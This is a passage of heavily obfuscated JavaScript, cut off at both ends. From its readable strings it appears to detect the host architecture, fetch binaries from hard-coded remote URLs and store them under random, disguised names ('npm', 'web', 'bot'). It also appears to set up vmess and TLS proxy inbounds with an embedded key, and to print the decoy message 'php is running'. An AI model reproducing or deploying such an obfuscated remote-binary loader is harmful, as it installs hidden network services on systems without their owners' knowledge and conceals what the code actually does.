7a,_0x41b4a1:0x18f,_0x360533:0x1c2,_0x13e19f:0x291,_0xd2a033:0x17b,_0x1836ee:0x201,_0x50e8a5:0x10b,_0x3093d4:0xea,_0xd72526:0x239,_0x11b76f:0x32f,_0x1dcaa4:0x339,_0x35f997:0x3e5,_0x272c4e:0x2b6,_0x53b26e:0x369},_0x4da4fd={_0x49a9de:0x515,_0x4bd31e:0x4b6,_0x1887ef:0x48a,_0xaa44b8:0x4ae,_0x2048d5:0x387,_0x4b5958:0x454,_0x1eaaa4:0x604,_0x31f13e:0x625,_0x1768f0:0x52c},_0x41c2a0={_0x35fe27:0x5ee,_0x223cec:0x656,_0x71cff0:0x58a,_0xd3ef38:0x563,_0x502f5c:0x5bc,_0x1f9568:0x594,_0x4171ef:0x707,_0x55bba:0x8b2,_0x186086:0x868,_0x24cb83:0x73e,_0x300a6d:0x50c,_0x78639b:0x613,_0x250b47:0x4e2,_0x550eb6:0x5c5,_0x2c5cfa:0x434,_0x5f505c:0x579,_0x557f29:0x48c,_0x5774ce:0x33d,_0xf82510:0x6de,_0x6285c1:0x64b,_0x5be6bc:0x485,_0x1e92a9:0x5f0,_0x209eed:0x620,_0x5f2a82:0x5b9,_0x187ee1:0x4d3,_0x5a0bac:0x62a,_0x14773c:0x5cc,_0x426d25:0x4d6,_0x5b26d5:0x526,_0x4c3a11:0x56c,_0x42c168:0x5f6,_0x56ecaa:0x60f,_0x1610c8:0x664,_0x3b2f8e:0x55d,_0x38d503:0x512,_0x3c68b8:0x4c8,_0x21c5f9:0x5ff,_0x5d034b:0x626,_0x51d04e:0x4b8,_0x4a0bd7:0x761,_0x4a2e1e:0x6f4,_0x3ae834:0x5d6,_0x1b4a6f:0x628,_0x18a721:0x73b,_0x394041:0x606,_0x3ed15e:0x545,_0x1a0be0:0x421,_0x227973:0x429,_0x433d1e:0x7a3,_0x3be6bd:0x708,_0x47f640:0x6c1,_0x270252:0x54d,_0x293117:0x6c8,_0x2de872:0x7aa,_0x5ebe61:0x687,_0x525c44:0x657,_0x22f02c:0x698,_0x419774:0x6a7,_0x9c5cd1:0x62e,_0x58d0e0:0x735,_0xab4453:0x696,_0x5d240a:0x5a5,_0x33c2e5:0x543,_0x4c3ac7:0x6b9,_0x1bf016:0x7dd,_0x316fff:0x6c7,_0x44560f:0x6b8,_0x40344a:0x714,_0x46a3cf:0x644,_0x38bfbb:0x593,_0x4b1452:0x64a,_0x4b2648:0x5ac,_0x2782d9:0x639,_0x2ea2c2:0x4b5,_0x70b2a8:0x665,_0x34adc4:0x5fe,_0x58aef8:0x4e1,_0x4e47b3:0x4d0,_0x3242dd:0x5ac,_0x15c9a6:0x857,_0x25844f:0x6df,_0x3de21c:0x724,_0xc04362:0x61d,_0x4d5fbf:0x62f,_0x2689db:0x750,_0x118b86:0x6d3,_0x29a88:0x6d8,_0x4ae169:0x64c,_0x53ad8c:0x625,_0x1222fc:0x5af,_0x170812:0x68a,_0x3fd151:0x697,_0x3f8b7d:0x473,_0x1b1a29:0x690,_0x1cd70b:0x56a,_0x325c5a:0x415,_0x13427c:0x515,_0x278bfd:0x35b,_0x17a9f3:0x47b,_0x6d10d3:0x43b,_0x598c16:0x3db,_0x3cbccf:0x530,_0x443c97:0x5b2,_0x388d0a:0x69e,_0x38d46d:0x71d,_0x23e001:0x59e,_0x2d325c:0x5bb,_0x14b465:0x767,_0x11dc30:0x5e5,_0x4fdb60:0x5d6,_0xce9eeb:0x54d,_0x3e81b3:0x6dc,_0x3d3977:0x437,_0x7b2a2e:0x570,_0x893b51:0x51a,_0x4c2c00:0x3cf,_0x1bcbaf:0x5cb,_0x49bb6b:0x4b8,_0x17cd58:0x766,_0xe95587:0x721,_0x2546fa:0x80f,_0x53e762:0x726,_0x10388d:0x49e,_0x441d41:0x5a6,_0x480cb9:0x53b,_0x18daaf:0x38d,_0x541373:0x5b7,_0x1d68fc:0x4a5,_0x47b03e:0x454,_0x1fe376:0x3d8,_0x25ccfe:0x501,_0x1ac5c7:0x57a,_0x2918de:0x560},_0x251774={_0x49e2cd:0x2f8,_0x2a12b2:0x27c},_0x3f4edb={_0x4e1a88:0x23d,_0x5cc79e:0x303,_0x7876a:0x3bf},_0x3ccc0b={_0x3d4b92:0x1e2},_0xa9d7da={'PqGvK':function(_0x13656c,_0x1818b6){return _0x13656c(_0x1818b6);},'mmwdk':_0x12ee7c(0x43f,0x34a,_0x3e5dc7._0x5c59f4,0x37c),'mACTd':function(_0x411076,_0x4ddf67){return _0x411076(_0x4ddf67);},'CHZBi':_0x4cbbd7(-_0x3e5dc7._0x179652,_0x3e5dc7._0x5bfe0f,_0x3e5dc7._0x44bd7c,-_0x3e5dc7._0xe2e2f8),'wyHnj':_0x12ee7c(_0x3e5dc7._0x1583f9,_0x3e5dc7._0x1f4ce1,_0x3e5dc7._0x1037ee,_0x3e5dc7._0x30d06e),'JEaqR':_0x4cbbd7(0x17d,_0x3e5dc7._0x525c4d,_0x3e5dc7._0x2b8d9d,_0x3e5dc7._0x47bf4b),'ZMYlb':_0x4cbbd7(_0x3e5dc7._0x4198a9,0x1f0,_0x3e5dc7._0x227345,_0x3e5dc7._0x484693),'kNNEc':function(_0x107a85,_0x2eb260){return _0x107a85===_0x2eb260;},'KhZkF':_0x4cbbd7(-_0x3e5dc7._0x20d77b,_0x3e5dc7._0x3e3f3f,_0x3e5dc7._0x56b2ec,-_0x3e5dc7._0x5b0278),'aTIMx':'InAXo','TRDSh':function(_0x3c29e1,_0x31f2a5){return _0x3c29e1===_0x31f2a5;},'rFWsh':'npm','NRxsL':'web','RSpdl':function(_0xa5cb0,_0x3ae66f){return _0xa5cb0===_0x3ae66f;},'tHBJg':_0x4cbbd7(-0x13c,0x26,_0x3e5dc7._0xa06b7e,-_0x3e5dc7._0xc190f5),'KdusX':_0x12ee7c(0x40f,0x286,_0x3e5dc7._0x3111b0,0x2a7),'DVMRC':function(_0x119457,_0x55d162){return _0x119457===_0x55d162;},'svsPU':_0x12ee7c(_0x3e5dc7._0x2a54b9,_0x3e5dc7._0x2b5d00,_0x3e5dc7._0x56ac38,_0x3e5dc7._0xf88f29),'OaLsT':function(_0x629d93,_0x2888a5){return _0x629d93===_0x2888a5;},'gtokB':_0x4cbbd7(-0x152,-0x2f,_0x3e5dc7._0x265f0d,0xa0),'GFrIy':function(_0x4457b6,_0x58e759){return _0x4457b6!==_0x58e759;},'jnpMi':'tzKzc','ZoHYr':function(_0x4457ab,_0x4a8bef){return _0x4457ab(_0x4a8bef);},'EcVPs':function(_0x207b77,_0x9ad831,_0x39d4ea,_0x164ff5){return _0x207b77(_0x9ad831,_0x39d4ea,_0x164ff5);},'tVzNl':_0x12ee7c(_0x3e5dc7._0xfe26b0,_0x3e5dc7._0x2e09b5,_0x3e5dc7._0x499141,0x25b),'GvCuL':function(_0x3bb591,_0x11a823){return _0x3bb591!==_0x11a823;},'QKtHq':_0x4cbbd7(-_0x3e5dc7._0x14605e,0x3a,_0x3e5dc7._0x4dbed5,-_0x3e5dc7._0xcc4016),'qFSTb':'https://amd64.ssss.nyc.mn/sb','MDEyz':'https://amd64.ssss.nyc.mn/bot','pkiHN':function(_0x43d3ee,_0x3c3385){return _0x43d3ee===_0x3c3385;},'mSrKA':_0x4cbbd7(-_0x3e5dc7._0x4cb99a,0x83,-_0x3e5dc7._0x5de90d,_0x3e5dc7._0x59d275),'jLyEM':function(_0x575b5b,_0xd04d52){return _0x575b5b===_0xd04d52;},'hjPwr':function(_0x4785a9,_0x48f31a){return _0x4785a9(_0x48f31a);},'TrhQh':function(_0x2dd0a0,_0x2f7f63){return _0x2dd0a0(_0x2f7f63);},'LgBGp':function(_0x220e56,_0x12839b){return _0x220e56>_0x12839b;},'XcAWj':_0x4cbbd7(0x30a,_0x3e5dc7._0x58538e,_0x3e5dc7._0x3df5d9,0x267),'JsDDT':function(_0x4a8af2,_0x4f020a){return _0x4a8af2!==_0x4f020a;},'QornZ':'yJtEa','OIxGt':'SAxVI','POHeY':_0x4cbbd7(-_0x3e5dc7._0x10d55d,-_0x3e5dc7._0xea3d13,-_0x3e5dc7._0x1df7a6,-_0x3e5dc7._0x41ddd9),'BJnkI':_0x12ee7c(_0x3e5dc7._0x1dbba4,0x1da,_0x3e5dc7._0x4506be,0x1e5),'rXNDv':_0x4cbbd7(_0x3e5dc7._0x3e0a80,-_0x3e5dc7._0xcd31cb,-_0x3e5dc7._0x3cd76e,-0x90),'wmUWJ':_0x4cbbd7(0x9f,-_0x3e5dc7._0x51439b,-_0x3e5dc7._0x43a43e,_0x3e5dc7._0x3028ac),'dSGob':function(_0x31f721,_0x187e61){return _0x31f721||_0x187e61;},'TJSKk':_0x12ee7c(0x2cf,0xda,_0x3e5dc7._0x2f467d,_0x3e5dc7._0x31381d),'ZHxWZ':_0x4cbbd7(_0x3e5dc7._0x89671a,_0x3e5dc7._0x12a180,_0x3e5dc7._0x4d1e7b,0x1bb),'Imuzw':function(_0x3d3d76){return _0x3d3d76();},'UvgeU':_0x4cbbd7(_0x3e5dc7._0x1620af,_0x3e5dc7._0x166709,_0x3e5dc7._0xcd4a5c,-0x86),'sRWfv':function(_0x5afcfe,_0x1b7c69,_0xe0a8c8){return _0x5afcfe(_0x1b7c69,_0xe0a8c8);},'cMyFb':_0x4cbbd7(_0x3e5dc7._0x416587,-0x11,0x43,_0x3e5dc7._0x266df0),'DlXrn':_0x4cbbd7(_0x3e5dc7._0x18d7b4,-0x52,_0x3e5dc7._0x5061c4,_0x3e5dc7._0x8b3a8b),'xBglS':'amd','OdYqK':function(_0x31546b,_0x10d273){return _0x31546b===_0x10d273;},'EGPVC':_0x4cbbd7(_0x3e5dc7._0x2399bf,-0x2b,_0x3e5dc7._0x3e21cf,-_0x3e5dc7._0xc5fbef),'ftRUx':'gIJPB','dVXYr':_0x12ee7c(_0x3e5dc7._0x3c69b9,_0x3e5dc7._0x427f23,_0x3e5dc7._0x444b62,_0x3e5dc7._0x3c452c),'LcZwB':_0x12ee7c(_0x3e5dc7._0x1d0d7a,0x458,_0x3e5dc7._0x25b421,_0x3e5dc7._0x51c65f),'ERdvU':_0x12ee7c(0xfd,_0x3e5dc7._0x15a5e3,_0x3e5dc7._0x8cf04f,_0x3e5dc7._0x17a3c7),'ffEVU':_0x4cbbd7(_0x3e5dc7._0x595350,_0x3e5dc7._0x50468e,-_0x3e5dc7._0x208d3d,_0x3e5dc7._0x52baa3),'pfgKP':_0x4cbbd7(_0x3e5dc7._0x605813,-0x15,-_0x3e5dc7._0x367762,_0x3e5dc7._0x489206),'wPIsb':'local','gznAI':'vmess-ws-in','fuzTm':_0x12ee7c(_0x3e5dc7._0xf5d150,_0x3e5dc7._0x3722f9,0x335,_0x3e5dc7._0x139590),'KGIky':_0x12ee7c(_0x3e5dc7._0x321d54,0x109,0x288,0x174),'OnaNF':_0x12ee7c(_0x3e5dc7._0x2ea347,_0x3e5dc7._0x181f69,_0x3e5dc7._0x2c2e5c,_0x3e5dc7._0x3051ff),'xugmJ':_0x12ee7c(0x192,_0x3e5dc7._0x48481f,_0x3e5dc7._0x28606f,_0x3e5dc7._0xe8bad9),'haORt':_0x4cbbd7(0x28e,_0x3e5dc7._0x4f9576,_0x3e5dc7._0x2e7e6b,_0x3e5dc7._0x430566),'yyvaM':_0x12ee7c(0x3d2,_0x3e5dc7._0x2f38e9,_0x3e5dc7._0x4d9a46,_0x3e5dc7._0x1b2a9f),'SKEmg':_0x4cbbd7(-_0x3e5dc7._0x42ac9a,_0x3e5dc7._0x5e684e,_0x3e5dc7._0x33fb2c,0xa4),'LqsUy':'eAx8o6MJrH4KE7ivPFFCa4qvYw5nJsYHCBQXPApQX1A=','LhiZK':_0x12ee7c(0x27e,_0x3e5dc7._0xe53eb,_0x3e5dc7._0x244d63,_0x3e5dc7._0xcd6e4b),'GKEYu':_0x12ee7c(_0x3e5dc7._0x1e5016,_0x3e5dc7._0x5d6f15,_0x3e5dc7._0x3bab33,0x180),'ZYeWh':_0x4cbbd7(-_0x3e5dc7._0x23191a,_0x3e5dc7._0x57f831,_0x3e5dc7._0x547f19,_0x3e5dc7._0x195141),'BNJcG':_0x12ee7c(_0x3e5dc7._0xe13da7,_0x3e5dc7._0x4d10f3,_0x3e5dc7._0x20a3cb,_0x3e5dc7._0xd0d740),'SfQkJ':'openai','QUbxg':_0x12ee7c(_0x3e5dc7._0x2359a7,_0x3e5dc7._0x2cfd94,_0x3e5dc7._0xbc8d44,_0x3e5dc7._0x190b1a),'iHtJt':_0x4cbbd7(_0x3e5dc7._0x56b2ec,-_0x3e5dc7._0x810975,-_0x3e5dc7._0x5f28f2,-0x119),'CKTlG':_0x12ee7c(0x20f,_0x3e5dc7._0x438fdf,0x3fc,_0x3e5dc7._0x4bd742),'BhXgR':function(_0x9cde06,_0x41a57d){return _0x9cde06!==_0x41a57d;},'WLPvt':_0x12ee7c(_0x3e5dc7._0x378dfc,_0x3e5dc7._0x2c0f7c,0x158,_0x3e5dc7._0x47b837),'vBPYM':_0x4cbbd7(0x1e6,_0x3e5dc7._0x14fef2,0x242,0x159),'mLErs':'EyERp','tsQXL':_0x12ee7c(_0x3e5dc7._0x25aeb6,_0x3e5dc7._0x12ea13,_0x3e5dc7._0x541ce3,_0x3e5dc7._0x3775cd),'FOkiO':'www.iij.ad.jp','rCqMi':function(_0x2dc0e9,_0x2744b6){return _0x2dc0e9(_0x2744b6);},'dOPDw':_0x4cbbd7(_0x3e5dc7._0x10b5b4,0xd5,0x8c,0x1f),'EznVr':_0x12ee7c(0x4f,_0x3e5dc7._0x40669f,0x1c3,0xfd),'xFbME':function(_0x43d8d8,_0x3e399b){return _0x43d8d8(_0x3e399b);},'GQspv':_0x12ee7c(_0x3e5dc7._0x48fa76,_0x3e5dc7._0x431627,0x300,_0x3e5dc7._0x358fce),'acpCR':function(_0x48afa9,_0x7c30af){return _0x48afa9(_0x7c30af);},'wfBXv':_0x12ee7c(0x340,_0x3e5dc7._0x39a078,_0x3e5dc7._0x4a4497,_0x3e5dc7._0x3f2f26),'RdKhj':function(_0x21bf54,_0x1aea0a){return _0x21bf54===_0x1aea0a;},'tDuTv':_0x12ee7c(_0x3e5dc7._0x2b79c3,0x1ad,_0x3e5dc7._0x346385,_0x3e5dc7._0x4f58e7),'EMJQZ':function(_0x2bee3f,_0x5d1e6f){return _0x2bee3f===_0x5d1e6f;},'EsGGx':_0x12ee7c(_0x3e5dc7._0x4e0201,_0x3e5dc7._0x17380a,_0x3e5dc7._0x58f391,0x381),'EyiAt':_0x12ee7c(0x2f8,_0x3e5dc7._0x3d4fb1,0x100,_0x3e5dc7._0x51a022),'PSQcZ':_0x4cbbd7(0x151,_0x3e5dc7._0x2b38ac,_0x3e5dc7._0x416587,0x5e),'cDGud':'200','FWzaj':_0x12ee7c(_0x3e5dc7._0x5d73d1,_0x3e5dc7._0x2e1b38,_0x3e5dc7._0x5a58c2,_0x3e5dc7._0x57e7ad),'AGLjZ':function(_0x194ed4,_0x406d0f){return _0x194ed4!==_0x406d0f;},'yZEkC':_0x12ee7c(_0x3e5dc7._0x2c0f7c,0xea,_0x3e5dc7._0xf0e310,_0x3e5dc7._0x5bd166),'yRxgH':function(_0x2bc752,_0xe26768){return _0x2bc752===_0xe26768;},'lKnvy':_0x12ee7c(_0x3e5dc7._0x176129,_0x3e5dc7._0xc06a31,0x1ab,_0x3e5dc7._0x22cc5e),'uklMP':_0x12ee7c(_0x3e5dc7._0x3f05eb,_0x3e5dc7._0x38acf6,_0x3e5dc7._0x122fa3,_0x3e5dc7._0x3f55da),'IOdVZ':function(_0x4a7b89,_0x79fb70){return _0x4a7b89===_0x79fb70;},'yLNfE':_0x12ee7c(_0x3e5dc7._0x4885fb,_0x3e5dc7._0x90b01f,_0x3e5dc7._0x4f7f9e,_0x3e5dc7._0x2ffcfc),'IqqJG':_0x12ee7c(_0x3e5dc7._0xc05673,_0x3e5dc7._0x451717,0x4a4,_0x3e5dc7._0x4dff58),'goarg':'rzOwC','uvJVw':_0x4cbbd7(_0x3e5dc7._0xba449e,0x10a,_0x3e5dc7._0x598c92,_0x3e5dc7._0x3eacbe),'xKaSi':'jMRPm','fzaBv':_0x12ee7c(_0x3e5dc7._0x2cf611,_0x3e5dc7._0x31c2d2,_0x3e5dc7._0x28aacb,0x11d),'CXeTc':'2096','FKCKA':_0x12ee7c(_0x3e5dc7._0x2ed089,_0x3e5dc7._0x5004d2,0x2d1,_0x3e5dc7._0x53677c),'GRHPR':_0x4cbbd7(-0x6f,-0x94,_0x3e5dc7._0x194220,_0x3e5dc7._0x1dbba4),'weMgy':'opSZw','LXSRA':_0x4cbbd7(_0x3e5dc7._0x20daa5,_0x3e5dc7._0x5c9fad,_0x3e5dc7._0x1ae812,_0x3e5dc7._0x37c022),'gfwnn':function(_0x5ea226,_0x21fdfd){return _0x5ea226&&_0x21fdfd;},'haGkp':_0x12ee7c(_0x3e5dc7._0x1eddfb,_0x3e5dc7._0x310f74,_0x3e5dc7._0x10936a,_0x3e5dc7._0x5dbd32),'MzMdl':function(_0x4ef3ae,_0x1c492e){return _0x4ef3ae(_0x1c492e);},'sRNif':'php\x20is\x20running','yGrBe':function(_0x43b012,_0x2dd241){return _0x43b012===_0x2dd241;},'NiLDj':_0x4cbbd7(_0x3e5dc7._0xbabdc,_0x3e5dc7._0x232166,0x15e,_0x3e5dc7._0x547f19),'UMLga':_0x12ee7c(_0x3e5dc7._0xececd2,_0x3e5dc7._0x14611c,_0x3e5dc7._0xb6d81e,0x1e0),'TGNaY':_0x4cbbd7(_0x3e5dc7._0x194220,-_0x3e5dc7._0x3e9922,_0x3e5dc7._0x217616,-_0x3e5dc7._0x568a1d),'qvXeD':'config.json','GkLGP':function(_0x1ab87f,_0x1dd787){return _0x1ab87f(_0x1dd787);},'khRbY':_0x4cbbd7(_0x3e5dc7._0x47bf4b,_0x3e5dc7._0x2d1bc5,0x294,_0x3e5dc7._0x527a64),'DzORH':_0x4cbbd7(_0x3e5dc7._0x34b260,-_0x3e5dc7._0x4dbf90,-_0x3e5dc7._0x54a74c,-_0x3e5dc7._0x737e36),'FrIPC':function(_0x206536,_0x37d828){return _0x206536!==_0x37d828;},'fpeFV':_0x12ee7c(_0x3e5dc7._0x3e9922,_0x3e5dc7._0x12a180,_0x3e5dc7._0x2d0198,_0x3e5dc7._0xbc8d44),'gTNJM':_0x12ee7c(_0x3e5dc7._0x8460e8,_0x3e5dc7._0x5d2c00,_0x3e5dc7._0x14163a,_0x3e5dc7._0x55cbef),'usGuz':_0x4cbbd7(_0x3e5dc7._0xcc4016,_0x3e5dc7._0x10b5b4,0x11b,_0x3e5dc7._0x525138),'uupku':_0x4cbbd7(-_0x3e5dc7._0x5827e5,-0x6c,_0x3e5dc7._0x14e84f,-_0x3e5dc7._0x177149),'yMytT':function(_0x44fca7){return _0x44fca7();},'vemNH':_0x4cbbd7(_0x3e5dc7._0x49cc0c,-0x43,_0x3e5dc7._0xb5cbcf,0x4b),'xIlOt':function(_0x569420,_0x3a65cf){return _0x569420(_0x3a65cf);},'JOWFm':function(_0x456d4b,_0x17f5f2){return _0x456d4b===_0x17f5f2;},'aGQvr':function(_0x3211cf,_0x1d0671){return _0x3211cf<_0x1d0671;},'BtfPe':_0x4cbbd7(-0x139,-_0x3e5dc7._0x318ff0,-0x1a6,-_0x3e5dc7._0x5d2037),'obzBR':function(_0x599fc7,_0x14f0b7){return _0x599fc7===_0x14f0b7;},'OsHzK':_0x12ee7c(0x2ab,_0x3e5dc7._0x2a8c77,_0x3e5dc7._0x664332,_0x3e5dc7._0x3dfa92),'ASHyg':'qRFdZ','PSlbG':function(_0x27045c,_0x273af2){return _0x27045c(_0x273af2);},'hadoj':_0x12ee7c(_0x3e5dc7._0x2d1bc5,0x1e7,_0x3e5dc7._0x4a20f7,_0x3e5dc7._0x4c387c),'JYSoP':'2083','xbhzI':_0x4cbbd7(_0x3e5dc7._0x378d98,_0x3e5dc7._0x5a1390,_0x3e5dc7._0x7dff4a,-0x7f),'EeKpP':_0x12ee7c(_0x3e5dc7._0x3f0992,_0x3e5dc7._0x4d237f,_0x3e5dc7._0x1536d4,_0x3e5dc7._0x43d1e2),'ouQci':'false','ONpjk':function(_0x11e508,_0x3ba3d6){return _0x11e508&&_0x3ba3d6;},'Bvrha':'JizUB','hYXtL':_0x4cbbd7(_0x3e5dc7._0x435931,_0x3e5dc7._0x15127f,_0x3e5dc7._0x4c1dbe,_0x3e5dc7._0x171cd4),'kivWZ':_0x12ee7c(_0x3e5dc7._0x80d4f1,_0x3e5dc7._0x357def,_0x3e5dc7._0x5ce786,0x35f),'zDOBE':function(_0xe60706,_0x5354a8){return _0xe60706!==_0x5354a8;},'mYOpQ':_0x12ee7c(_0x3e5dc7._0x56a32d,0x2d1,_0x3e5dc7._0x47b837,_0x3e5dc7._0xb6d81e),'PYJfJ':'Failed\x20to\x20extract\x20privateKey\x20or\x20publicKey\x20from\x20key.txt.','XhzQS':'Public\x20Key:','NFrEC':function(_0x2b9813){return _0x2b9813();}},_0x5bd95e=getSystemArchitecture(),_0x641fbd=getFilesForArchitecture(_0x5bd95e);if(_0xa9d7da[_0x4cbbd7(0xbd,0xfc,_0x3e5dc7._0xf5d150,_0x3e5dc7._0x220dff)](_0x641fbd[_0x12ee7c(0x112,_0x3e5dc7._0x3179fd,_0x3e5dc7._0x4f7467,_0x3e5dc7._0x306fe8)],0x1d73+-0x1056+-0xd1d)){if(_0xa9d7da[_0x12ee7c(0x40f,_0x3e5dc7._0x5af0ec,_0x3e5dc7._0x468ec5,_0x3e5dc7._0x215a85)]===_0xa9d7da[_0x12ee7c(_0x3e5dc7._0x289cdb,0x2f3,_0x3e5dc7._0x4b5471,_0x3e5dc7._0x215a85)]){console[_0x12ee7c(_0x3e5dc7._0x2e5354,_0x3e5dc7._0x38acf6,_0x3e5dc7._0x17c990,0x365)](_0x4cbbd7(0x249,_0x3e5dc7._0x4158fe,_0x3e5dc7._0x5bebc9,_0x3e5dc7._0x1abec6));return;}else _0x335aaa[_0x4cbbd7(0x16f,0x18f,_0x3e5dc7._0x1e5349,_0x3e5dc7._0x35fff7)](_0x4cbbd7(-_0x3e5dc7._0x259405,-_0x3e5dc7._0x5198e2,_0x3e5dc7._0x2e53d7,-_0x3e5dc7._0x1137be));}const _0x1c592b=_0x641fbd['map'](_0x363404=>{const _0x49bc2b={_0xe9435f:0x1b3},_0x5a4abf={_0xa00c9b:0x13b,_0x2d8536:0x4a};function _0x489636(_0x3e2cda,_0x2487fe,_0x286216,_0x1d3e20){return _0x4cbbd7(_0x3e2cda-0xa0,_0x1d3e20-0x557,_0x2487fe,_0x1d3e20-_0x3ccc0b._0x3d4b92);}function _0x24ae9f(_0x5f3a9a,_0x4b4860,_0x3ef144,_0x1853d0){return _0x4cbbd7(_0x5f3a9a-_0x5a4abf._0xa00c9b,_0x3ef144-0x525,_0x5f3a9a,_0x1853d0-_0x5a4abf._0x2d8536);}const _0x401335={'uRvqv':function(_0x15c83a,_0x368dfc){return _0xa9d7da['PqGvK'](_0x15c83a,_0x368dfc);},'mgGYZ':_0xa9d7da[_0x489636(_0x41c2a0._0x35fe27,_0x41c2a0._0x223cec,_0x41c2a0._0x71cff0,0x54e)],'mDMdq':function(_0x1082b1,_0x1e8910){const _0x282a74={_0x4dca9c:0x54,_0x1f5063:0x1b};function _0x438c4e(_0x3a6566,_0x2457fb,_0x6b4531,_0x1524d3){return _0x489636(_0x3a6566-_0x282a74._0x4dca9c,_0x3a6566,_0x6b4531-_0x282a74._0x1f5063,_0x2457fb- -0x42e);}return _0xa9d7da[_0x438c4e(_0x3f4edb._0x4e1a88,_0x3f4edb._0x5cc79e,0x31f,_0x3f4edb._0x7876a)](_0x1082b1,_0x1e8910);},'MVSyh':_0xa9d7da[_0x489636(_0x41c2a0._0xd3ef38,_0x41c2a0._0x502f5c,0x536,_0x41c2a0._0x1f9568)],'QJGOE':_0x489636(_0x41c2a0._0x4171ef,_0x41c2a0._0x55bba,_0x41c2a0._0x186086,_0x41c2a0._0x24cb83),'cqCkb':_0xa9d7da[_0x489636(_0x41c2a0._0x300a6d,_0x41c2a0._0x78639b,_0x41c2a0._0x250b47,_0x41c2a0._0x550eb6)],'TOioZ':function(_0x59dfc0,_0x3176b4){function _0x5a4d6f(_0x5ba45a,_0x550235,_0x8b511,_0x41bc68){return _0x489636(_0x5ba45a-_0x49bc2b._0xe9435f,_0x5ba45a,_0x8b511-0xb8,_0x550235- -0x439);}return _0xa9d7da[_0x5a4d6f(0x2d6,_0x251774._0x49e2cd,0x317,_0x251774._0x2a12b2)](_0x59dfc0,_0x3176b4);},'lpipj':_0xa9d7da[_0x24ae9f(_0x41c2a0._0x2c5cfa,_0x41c2a0._0x5f505c,_0x41c2a0._0x557f29,_0x41c2a0._0x5774ce)],'kZLmh':_0xa9d7da['ZMYlb'],'hqhpl':function(_0x321435,_0x52e936){return _0x321435(_0x52e936);},'whIVi':_0x24ae9f(0x6eb,_0x41c2a0._0xf82510,0x6fb,_0x41c2a0._0x6285c1),'UrzCy':_0x24ae9f(0x487,_0x41c2a0._0x5be6bc,0x544,_0x41c2a0._0x1e92a9)};if(_0xa9d7da[_0x24ae9f(_0x41c2a0._0x209eed,_0x41c2a0._0x5f2a82,0x5ed,_0x41c2a0._0x187ee1)](_0xa9d7da[_0x24ae9f(_0x41c2a0._0x5a0bac,_0x41c2a0._0x14773c,_0x41c2a0._0x426d25,_0x41c2a0._0x5b26d5)],_0xa9d7da[_0x24ae9f(_0x41c2a0._0x4c3a11,_0x41c2a0._0x42c168,0x6c0,_0x41c2a0._0x56ecaa)])){if(_0x401335[_0x489636(0x57a,0x6f0,_0x41c2a0._0x1610c8,0x641)](_0x2f84e3,_0x1afdfb)){const _0x4acd0d={};_0x4acd0d[_0x24ae9f(_0x41c2a0._0x3b2f8e,0x54b,0x526,_0x41c2a0._0x38d503)]=_0x38d665,_0x15b04b[_0x489636(_0x41c2a0._0x3c68b8,_0x41c2a0._0x21c5f9,_0x41c2a0._0x5d034b,_0x41c2a0._0x51d04e)][_0x24ae9f(_0x41c2a0._0x4a0bd7,0x57e,_0x41c2a0._0x4a2e1e,_0x41c2a0._0x3ae834)]({'tag':_0x401335[_0x489636(_0x41c2a0._0x1b4a6f,_0x41c2a0._0x18a721,_0x41c2a0._0x394041,0x647)],'type':_0x489636(_0x41c2a0._0x3ed15e,_0x41c2a0._0x1a0be0,_0x41c2a0._0x227973,0x47e),'listen':'::','listen_port':_0x401335['mDMdq'](_0x1a55ff,_0x11230a),'users':[_0x4acd0d],'masquerade':_0x401335[_0x24ae9f(_0x41c2a0._0x433d1e,_0x41c2a0._0x3be6bd,_0x41c2a0._0x47f640,_0x41c2a0._0x270252)],'tls':{'enabled':!![],'alpn':['h3'],'certificate_path':_0x12aaf4[_0x24ae9f(_0x41c2a0._0x293117,_0x41c2a0._0x2de872,_0x41c2a0._0x5ebe61,_0x41c2a0._0x525c44)](_0x310efd,_0x401335[_0x24ae9f(_0x41c2a0._0x22f02c,_0x41c2a0._0x419774,_0x41c2a0._0x9c5cd1,_0x41c2a0._0x58d0e0)]),'key_path':_0x17ffc7[_0x489636(_0x41c2a0._0xab4453,_0x41c2a0._0x5d240a,_0x41c2a0._0x33c2e5,_0x41c2a0._0x4c3ac7)](_0x5be6ed,_0x401335[_0x489636(0x6bc,_0x41c2a0._0x1bf016,0x5ca,_0x41c2a0._0x316fff)])}});}}else{let _0x2c1ce6;if(_0xa9d7da[_0x489636(_0x41c2a0._0x44560f,_0x41c2a0._0x40344a,0x53c,_0x41c2a0._0x46a3cf)](_0x363404[_0x489636(_0x41c2a0._0x38bfbb,0x4e6,_0x41c2a0._0x4b1452,_0x41c2a0._0x4b2648)],_0xa9d7da[_0x489636(_0x41c2a0._0x2782d9,_0x41c2a0._0x2ea2c2,_0x41c2a0._0x70b2a8,_0x41c2a0._0x34adc4)]))_0x2c1ce6=npmRandomName;else{if(_0x363404[_0x489636(_0x41c2a0._0x58aef8,0x52b,_0x41c2a0._0x4e47b3,_0x41c2a0._0x3242dd)]===_0xa9d7da[_0x24ae9f(_0x41c2a0._0x15c9a6,_0x41c2a0._0x25844f,_0x41c2a0._0x3de21c,_0x41c2a0._0xc04362)]){if(_0xa9d7da[_0x24ae9f(_0x41c2a0._0x4d5fbf,_0x41c2a0._0x2689db,_0x41c2a0._0x118b86,_0x41c2a0._0x29a88)](_0xa9d7da[_0x24ae9f(_0x41c2a0._0x4ae169,_0x41c2a0._0x53ad8c,_0x41c2a0._0x1222fc,_0x41c2a0._0x170812)],_0xa9d7da[_0x489636(_0x41c2a0._0x3fd151,_0x41c2a0._0x3f8b7d,_0x41c2a0._0x1b1a29,_0x41c2a0._0x1cd70b)])){const _0x12ee68=_0x246495['apply'](_0xe63825,arguments);return _0x43a802=null,_0x12ee68;}else _0x2c1ce6=webRandomName;}else{if(_0xa9d7da[_0x489636(_0x41c2a0._0x325c5a,_0x41c2a0._0x13427c,_0x41c2a0._0x278bfd,_0x41c2a0._0x17a9f3)](_0x363404['fileName'],_0xa9d7da['svsPU']))_0x2c1ce6=botRandomName;else 